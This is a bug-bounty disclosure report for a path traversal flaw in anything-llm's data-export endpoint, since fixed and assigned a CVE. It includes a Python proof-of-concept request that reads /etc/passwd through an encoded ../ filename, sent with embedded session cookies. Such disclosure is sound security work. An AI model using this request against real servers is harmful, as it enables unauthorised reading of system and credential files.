We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

Relative path traversal in mintplex-labs/anything-llm

Valid

Reported on

Sep 2nd 2023

Description

The endpoint /system/data-exports/:filename is intended to export AnythingLLM data zip file for download based on a specified filename parameter. However, a critical security vulnerability arises due to insufficient validation and sanitization of the request.params.filename parameter. Attackers can potentially exploit this vulnerability to perform a relative path traversal attack, which can lead to unauthorized access to sensitive local files on the server.

Proof of Concept

import requests

url = "http://localhost:3001/api/system/data-exports/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64" # ../../../../../etc/passwd URL encoded all chars

headers = {
    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/116.0",
    "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
    "Accept-Language": "en-US,en;q=0.5",
    "Accept-Encoding": "gzip, deflate",
    "Referer": "http://localhost:3000/",
    "Cookie": "token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpZCI6IjY0ZjM1MTJlMWRiNDJhMzAzNjc5OWE4OSIsImlhdCI6MTY5MzY2NzY0MCwiZXhwIjoxNzI1MjAzNjQwfQ.FMcWpACDQExFVh4exkdcXmjh2uBPHDjvmXKB8u0Zyw8; sid=Fe26.2**a13f75a20d1ab29190513367825f331c6b83f698584b986bad7da63de5f91603*BSNwc-AmRY-DIS5FygAJww*uPTIhpPwf61Q2WpaEphYQ7n1wl_kjb1Ik59rIo50XoU0wqxPwHeKeldypcLPQZSYNxNMDE7o1i6P1izNZkhct7bEU0MueguXycEevdP2_BzSjwJm98wNQ-ZRo1ZR0FE8dTwCVw4Anh8f3fzRfICiBq36IiTk8fbA99PmxOB2fmhG3Z_58urj492H70XnR2t9Kd8MUO615ir6pbznH_w7ZzMRlWawO1Ktc8WF8HuCR4Mzis6-Onz38AYedjG81X3y**8e82b94d445bb10265f78b6ad89890011cc422e76676dd6171144c72ff7a63d4*KINx5ralgsUWwaYFkR8eD7nQgRMZtn7ovWYEmSn_wME",
    "Upgrade-Insecure-Requests": "1",
    "Sec-Fetch-Dest": "document",
    "Sec-Fetch-Mode": "navigate",
    "Sec-Fetch-Site": "same-site",
    "Sec-Fetch-User": "?1"
}

response = requests.get(url, headers=headers)
print(response.text)

Impact

This vulnerability can lead to unauthorized access to sensitive files, data leakage, data manipulation, and even complete compromise of a system or application. This can result in significant financial loss, reputation damage, and legal consequences for organizations. It's a critical security issue that demands immediate attention and remediation.

Occurrences

We are processing your report and will contact the mintplex-labs/anything-llm team within 24 hours. 19 days ago
Abdelwahed Madani Yousfi modified the report
19 days ago
Abdelwahed Madani Yousfi modified the report
19 days ago
Abdelwahed Madani Yousfi modified the report
18 days ago
We created a GitHub Issue asking the maintainers to create a SECURITY.md 18 days ago
We have contacted a member of the mintplex-labs/anything-llm team and are waiting to hear back 12 days ago
mintplex-labs/anything-llm maintainer validated this vulnerability 10 days ago
Abdelwahed Madani Yousfi has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
mintplex-labs/anything-llm maintainer gave praise 10 days ago
Resolved by core team - thanks for disclosure!
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
mintplex-labs/anything-llm maintainer marked this as fixed in 0.0.1 with commit 3c88ae 10 days ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE
mintplex-labs/anything-llm maintainer published this vulnerability 10 days ago
system.js#L320 has been validated
to join this conversation